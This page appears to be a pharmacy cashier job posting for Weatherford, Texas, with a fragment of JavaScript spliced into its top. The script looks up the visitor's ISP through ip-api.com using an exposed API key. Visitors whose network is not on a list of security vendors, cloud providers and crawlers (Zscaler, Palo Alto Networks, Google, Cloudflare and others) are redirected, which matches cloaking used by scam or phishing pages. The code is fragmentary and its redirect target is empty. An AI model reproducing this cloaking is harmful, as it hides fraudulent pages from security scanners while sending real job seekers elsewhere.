Pharmacy Cashier
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a friendly and detail-oriented Pharmacy Cashier to join our team in Weatherford, Texas. In this role, you will assist customers at the pharmacy counter, handle transactions accurately, and provide exceptional service to ensure a positive experience.
Responsibilities include:
- Greet customers and assist with their purchases and inquiries
- Process prescriptions and sales transactions accurately
- Maintain organized and clean checkout areas
- Answer phone calls and provide information as needed
- Support pharmacy staff with inventory management and restocking
- Ensure compliance with all safety and privacy regulations
Skills needed:
- Strong communication and interpersonal skills
- Attention to detail and accuracy
- Ability to work efficiently in a fast-paced environment
- Basic math and computer skills
- Customer service oriented attitude
Benefits include:
- Competitive pay
- Flexible scheduling
- Paid time off
- Employee discounts
- Opportunities for growth and development